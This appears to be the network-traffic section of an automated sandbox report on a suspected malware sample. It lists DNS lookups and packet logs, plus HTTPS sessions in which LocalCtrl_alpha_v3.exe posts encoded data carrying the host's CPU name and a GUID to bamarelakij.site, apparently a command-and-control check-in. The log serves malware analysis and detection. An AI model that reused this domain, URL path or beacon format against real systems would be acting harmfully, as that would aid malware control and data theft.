                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:58.859308958 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:58.959647894 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:58.978111029 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:58.978121996 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:58.978130102 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:58.978588104 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:58.986346006 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.097460032 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.130423069 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.139609098 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.139624119 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.139627934 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.140516043 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.147718906 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.252645969 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.278974056 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.278989077 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.278997898 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.279613972 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.287849903 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.414362907 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.414376020 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.442414045 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.454881907 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.454935074 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.454945087 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.455470085 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.462980032 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:59.576239109 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:01.946382999 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:01.970870018 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.074800014 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.081525087 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.081635952 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.081681013 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.083412886 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.101190090 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.199951887 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.206974030 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.206988096 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.206998110 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.229365110 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.264508009 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.319793940 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.352054119 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.419877052 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.425401926 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.425535917 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.425546885 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.425822973 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.433526039 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.533824921 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.541985989 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.542006016 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.542016029 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.542470932 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.542656898 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.542656898 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.550306082 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.649733067 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.658143044 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.658160925 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.658171892 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.658597946 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.666654110 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.769180059 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.783493042 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.783587933 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.783643961 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.783924103 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.792273045 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:02.956530094 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.106931925 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.107261896 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.147154093 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.155937910 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.155951977 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.156209946 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.156294107 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.254771948 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.260689974 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.260751009 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.260763884 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.261060953 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.269445896 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.370476961 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.376955986 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.377053976 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.377093077 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.377624989 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.384746075 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.483361959 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.490322113 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.490339994 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.490350008 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.490719080 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.499614954 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.600935936 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.607902050 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.607920885 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.607934952 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.608462095 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.608618021 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.608664036 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.618506908 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.861614943 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.878717899 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.879725933 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.879750013 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.879760027 CET44353928184.28.190.91192.168.2.8
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.880125999 CET53928443192.168.2.8184.28.190.91
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:56:03.889637947 CET53928443192.168.2.8184.28.190.91
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 14:55:25.762111902 CET | 192.168.2.8 | 1.1.1.1 | 0xd416 | Standard query (0) | bamarelakij.site | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:37.755166054 CET | 192.168.2.8 | 1.1.1.1 | 0xa9a8 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:37.755510092 CET | 192.168.2.8 | 1.1.1.1 | 0x1151 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:38.686942101 CET | 192.168.2.8 | 1.1.1.1 | 0xd507 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:38.687102079 CET | 192.168.2.8 | 1.1.1.1 | 0xe014 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:40.138350010 CET | 192.168.2.8 | 1.1.1.1 | 0x47c2 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:40.138448954 CET | 192.168.2.8 | 1.1.1.1 | 0x18c4 | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:40.158176899 CET | 192.168.2.8 | 1.1.1.1 | 0x8824 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:40.158294916 CET | 192.168.2.8 | 1.1.1.1 | 0xc188 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:40.160234928 CET | 192.168.2.8 | 1.1.1.1 | 0xd79d | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:40.160612106 CET | 192.168.2.8 | 1.1.1.1 | 0x51b4 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:40.383848906 CET | 192.168.2.8 | 1.1.1.1 | 0xed58 | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:40.383999109 CET | 192.168.2.8 | 1.1.1.1 | 0xeb | Standard query (0) | api.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:41.679882050 CET | 192.168.2.8 | 1.1.1.1 | 0xe27a | Standard query (0) | assets2.msn.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:41.680064917 CET | 192.168.2.8 | 1.1.1.1 | 0xbf7f | Standard query (0) | assets2.msn.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:42.287301064 CET | 192.168.2.8 | 1.1.1.1 | 0xcccd | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:42.287509918 CET | 192.168.2.8 | 1.1.1.1 | 0x501 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:42.287801027 CET | 192.168.2.8 | 1.1.1.1 | 0xf226 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:42.287940979 CET | 192.168.2.8 | 1.1.1.1 | 0x33d2 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:42.837644100 CET | 192.168.2.8 | 1.1.1.1 | 0x1cc9 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:42.837845087 CET | 192.168.2.8 | 1.1.1.1 | 0x6044 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Jan 9, 2025 14:55:42.891383886 CET | 192.168.2.8 | 1.1.1.1 | 0x4b9 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:42.891519070 CET | 192.168.2.8 | 1.1.1.1 | 0x9b1c | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 14:55:25.775444984 CET | 1.1.1.1 | 192.168.2.8 | 0xd416 | No error (0) | bamarelakij.site | - | 104.21.80.52 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:25.775444984 CET | 1.1.1.1 | 192.168.2.8 | 0xd416 | No error (0) | bamarelakij.site | - | 172.67.174.91 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:37.762120962 CET | 1.1.1.1 | 192.168.2.8 | 0x1151 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:55:37.762677908 CET | 1.1.1.1 | 192.168.2.8 | 0xa9a8 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:55:37.764769077 CET | 1.1.1.1 | 192.168.2.8 | 0x8606 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:55:37.764769077 CET | 1.1.1.1 | 192.168.2.8 | 0x8606 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | - | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 14:55:37.765041113 CET | 1.1.1.1 | 192.168.2.8 | 0x7cd4 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:55:38.693737984 CET | 1.1.1.1 | 192.168.2.8 | 0xe014 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:55:38.694046021 CET | 1.1.1.1 | 192.168.2.8 | 0xd507 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 14:55:40.145193100 CET | 1.1.1.1 | 192.168.2.8 | 0x47c2 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.32 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.145193100 CET1.1.1.1192.168.2.80x47c2No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.145193100 CET1.1.1.1192.168.2.80x47c2No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.145193100 CET1.1.1.1192.168.2.80x47c2No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.372519016 CET1.1.1.1192.168.2.80x8824No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.372582912 CET1.1.1.1192.168.2.80xc188No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.372956038 CET1.1.1.1192.168.2.80x51b4No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.373445988 CET1.1.1.1192.168.2.80xd79dNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.391046047 CET1.1.1.1192.168.2.80xebNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:40.391937017 CET1.1.1.1192.168.2.80xed58No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.687053919 CET1.1.1.1192.168.2.80xbf7fNo error (0)assets2.msn.comassets2.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:41.688744068 CET1.1.1.1192.168.2.80xe27aNo error (0)assets2.msn.comassets2.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.296997070 CET1.1.1.1192.168.2.80xcccdNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.296997070 CET1.1.1.1192.168.2.80xcccdNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297288895 CET1.1.1.1192.168.2.80x501No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297465086 CET1.1.1.1192.168.2.80x33d2No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297774076 CET1.1.1.1192.168.2.80xf226No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.297774076 CET1.1.1.1192.168.2.80xf226No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.844307899 CET1.1.1.1192.168.2.80x1cc9No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.844307899 CET1.1.1.1192.168.2.80x1cc9No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.844578028 CET1.1.1.1192.168.2.80x6044No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.898227930 CET1.1.1.1192.168.2.80x4b9No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.898227930 CET1.1.1.1192.168.2.80x4b9No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jan 9, 2025 14:55:42.898713112 CET1.1.1.1192.168.2.80x9b1cNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          • bamarelakij.site
                                                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                                            • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                            • browser.events.data.msn.com
                                                                                                                                                                                                                                                                            • ntp.msn.com
                                                                                                                                                                                                                                                                            • c.msn.com
                                                                                                                                                                                                                                                                          • deff.nelreports.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49712 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:26 UTC | 354 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 147
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
2025-01-09 13:55:26 UTC | 147 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 c1 60 aa cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd`$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:55:26 UTC | 782 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:26 GMT
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SykusQEfpyxKf1Wi1Rc38mKNclh4YCQrWGy34oIpV0xQ0eKxr8i1EDTl%2FDA%2BozIWHEwnwlIfUvskB3I1sqwtEXB%2BGYBvHtdtmQjX1GXLccTRSXNrVpp%2Bfte5SrUSn0GOde0n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ecc9e9974289-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1574&rtt_var=604&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1137&delivery_rate=1790312&cwnd=150&unsent_bytes=0&cid=80d2aa18946620ef&ts=728&x=0"
                                                                                                                                                                                                                                                                          Data Ascii: lW6IATElEW6IAlnx KWT\l\W6IA@,alaW6IAT\NlW6IA@dlW6IA


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49714 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:27 UTC | 385 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: B5smxlJLNo14xsxDJtIvbZCH8YE
Content-Length: 53
Host: bamarelakij.site
2025-01-09 13:55:27 UTC | 53 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii:
2025-01-09 13:55:28 UTC | 742 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 13:55:28 GMT
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qut%2FhY4FnM4ufXjayIyQ5ZAJ8QGruquqXJWvahInxZsa3KJ61HRqACrfY5GcZl7vRslHA7MzevB8HITiU07xACdy4WplJ9GBhBhVr0CHAMcER9Rr8hf8jamPQODu9zRmERsE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4ecd308ecc330-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1620&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1074&delivery_rate=1699650&cwnd=235&unsent_bytes=0&cid=ee01516d4c4ca965&ts=331&x=0"
